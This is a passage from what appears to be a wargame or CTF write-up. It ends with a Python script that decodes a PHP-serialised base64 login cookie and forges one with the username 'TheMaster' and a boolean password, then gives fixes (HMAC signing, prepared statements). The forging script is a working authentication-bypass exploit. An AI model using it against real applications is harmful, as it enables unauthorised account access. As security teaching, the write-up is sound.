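        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_unserialize(data):
    """Inverse of php_serialize for the same subset (ASCII assumed: byte offsets == str offsets)."""
    def parse(i):
        tag = data[i]
        if tag in "bi":
            end = data.index(";", i)
            num = int(data[i + 2:end])
            return (num == 1 if tag == "b" else num), end + 1
        if tag == "s":
            colon = data.index(":", i + 2)
            n = int(data[i + 2:colon])
            start = colon + 2                              # skip ':"'
            return data[start:start + n], start + n + 2    # skip '";'
        if tag == "a":
            colon = data.index(":", i + 2)
            count = int(data[i + 2:colon])
            j = colon + 2                                  # skip ':{'
            out = {}
            for _ in range(count):
                key, j = parse(j)
                out[key], j = parse(j)
            return out, j + 1                              # skip '}'
        raise ValueError(f"unsupported type tag {tag!r} at offset {i}")

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def decode_login(token):
    return php_unserialize(base64.b64decode(token).decode())


def forge_login(token, username, password=True):
    """Re-issue the token with a new username and a boolean password; lengths are regenerated."""
    data = decode_login(token)
    data["username"] = username
    data["password"] = password
    return base64.b64encode(php_serialize(data).encode()).decode()


if __name__ == "__main__":
    print(decode_login(ORIGINAL_LOGIN))
    print(forge_login(ORIGINAL_LOGIN, "TheMaster"))
```

forge_login(ORIGINAL_LOGIN, "TheMaster") reproduces the working token from step 5 byte for byte. The underlying defect is that the server unserializes a value the client controls; the fix is to keep session state server-side, or, if a token must carry it, to sign it (for example with an HMAC) and verify the signature before anything is decoded.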

Summary

1. Fortunately, keeping an application out of SQL injection trouble is not especially hard: never build SQL by concatenating form input into the statement. Use prepared statements with bound parameters (or an ORM that does) and treat input filtering as defence in depth only; level 6 shows that data already stored in the database is still attacker-controlled, and level 10 that encoding is not validation (do not trust any user input).
2. The hackers who do this kind of penetration testing really are something else.
3. Keep writing things up, read how others approach the same levels, and build up experience.
